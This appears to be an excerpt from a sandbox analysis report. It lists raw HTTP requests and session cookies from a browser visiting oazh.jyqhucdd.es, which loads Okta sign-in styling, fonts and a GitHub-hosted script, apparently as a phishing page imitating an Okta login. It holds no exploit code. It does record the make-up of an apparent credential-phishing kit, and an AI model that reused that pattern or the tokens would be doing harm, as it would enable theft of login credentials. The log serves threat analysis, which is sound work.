              Source: global trafficHTTP traffic detected: GET /zc6hjQbDowaAuB5rXli4tk4Mm1Cam8VNCSClffw HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBJK2FDS2pIM09vZjFCVUN6djVNaUE9PSIsInZhbHVlIjoiOHBTZlNoOHg3T2c0OCtPQTZHem4zOFdScS9pdklJTi94M0NwY1JBUWFlYkliN0NSbFdXRkFWY3dyWjMwZEdVQ0R1b2FtcGRhNGZmWnRBa2ZpYU9EOHZ2K05RMHBnYlNLMGlzSVF6aUtTM214Q2o3Ny9ua1M0d1FHcXJ0TlU4YmUiLCJtYWMiOiJiZDE3NTEwNjc4ZjlmMGZkZTUwNmJjZWFlMTVlMmY3YzkyNTEyMTIyNjM0ODI0MzQ3OTY4ZGVkNWExZmUyNzA0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZaNndlSTVJRFhHVzR2OUd3dDJ2c1E9PSIsInZhbHVlIjoiQnpFYVAzRnJTSEk2NWNCRjBsc05saHMyQ3RWTSt3bUpxNmtjaEl2M1IvZGlIV0xMM2svMnhzNzFsQlhiekxucmsrbFpOYko2d1BGT05rWmlrMk92UEwwMXB4dHVrWXlqUEpmWHpZMHhhQVVYZGh1Q0k3TkJKcnRST1JTalhOVGIiLCJtYWMiOiJlMDU0MDliZWVkYTQ5NDgxNDc3ZWRjMGIyOGY4MzQxYjZhMmU1MWJjMTkyMWU2MDcxZDIzODAyYTE5NjVmNzA1IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUU HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://oazh.jyqhucdd.es/Yx6Is/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBJK2FDS2pIM09vZjFCVUN6djVNaUE9PSIsInZhbHVlIjoiOHBTZlNoOHg3T2c0OCtPQTZHem4zOFdScS9pdklJTi94M0NwY1JBUWFlYkliN0NSbFdXRkFWY3dyWjMwZEdVQ0R1b2FtcGRhNGZmWnRBa2ZpYU9EOHZ2K05RMHBnYlNLMGlzSVF6aUtTM214Q2o3Ny9ua1M0d1FHcXJ0TlU4YmUiLCJtYWMiOiJiZDE3NTEwNjc4ZjlmMGZkZTUwNmJjZWFlMTVlMmY3YzkyNTEyMTIyNjM0ODI0MzQ3OTY4ZGVkNWExZmUyNzA0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZaNndlSTVJRFhHVzR2OUd3dDJ2c1E9PSIsInZhbHVlIjoiQnpFYVAzRnJTSEk2NWNCRjBsc05saHMyQ3RWTSt3bUpxNmtjaEl2M1IvZGlIV0xMM2svMnhzNzFsQlhiekxucmsrbFpOYko2d1BGT05rWmlrMk92UEwwMXB4dHVrWXlqUEpmWHpZMHhhQVVYZGh1Q0k3TkJKcnRST1JTalhOVGIiLCJtYWMiOiJlMDU0MDliZWVkYTQ5NDgxNDc3ZWRjMGIyOGY4MzQxYjZhMmU1MWJjMTkyMWU2MDcxZDIzODAyYTE5NjVmNzA1IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /341v5JdmdikxKxNab7Brkrd6720 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /abqxZQ7ipqHVgh30 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveOrigin: https://oazh.jyqhucdd.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveOrigin: https://oazh.jyqhucdd.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveOrigin: https://oazh.jyqhucdd.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveOrigin: https://oazh.jyqhucdd.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250325%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250325T130408Z&X-Amz-Expires=300&X-Amz-Signature=33215a3452021144bf19fcdb418538d830ecaf10bdf4d6b3c45bbda2c6da929d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://oazh.jyqhucdd.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveOrigin: https://oazh.jyqhucdd.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-aliveOrigin: https://oazh.jyqhucdd.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34C9UeDiKjiQraH7kl8lyOmCe2sB89108 HTTP/1.1Host: oazh.jyqhucdd.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InV5SUN2WEQzM0lSQTd5LzdqbktnVWc9PSIsInZhbHVlIjoiU0hMRGFtVWlNNVJRVVdwT0lIZHVXNSs0dVFSVU9wOXJGdUlxUkJOOUZsTUxTdDljM0pLbFhqS1VzWmR0d1RiS1lmYk51bjNvakt4OWZhUkVEVUFkd0xNQUlIRE9GQlY2TVQrellHanlzQ3RYQUFOcmFvSHREVEpRdS9zd1NxMkQiLCJtYWMiOiI1MDI5MDg5YWU5ZTkxNTRhMTkwZDEzOWI1MTBlZDQ1OTBhNGI0MjRlZjg3NDFjODJlY2E1NTgyMTVkOTk0Nzc3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2UkZyem5BS29XWXBjNjdWby9xaVE9PSIsInZhbHVlIjoiMHpFbk9LeU9kdHRiVklka1dxMDdURWdKb3RJRDZuMTRUZ2ptNWxOT29hSFZZVTZabzhJVGpMakMzbTlZMjdWRzg0OXREK0VnWnAxV3R4WkdNdDIvMUtrY0RMSUhmUGRIM1M0c1JsYVZxRDNoaE1kSDJkSnVNWWhHRTBnRll2dkkiLCJtYWMiOiJmZmI0ODE3MTI4YTQxNzliMTcxMmFkMzk2OTFlZjg1NmU0ZTVhNjNkYzZkMGMwZjg5NzkzMzlhNjg0MTI2NTZlIiwidGFnIjoiIn0%3D
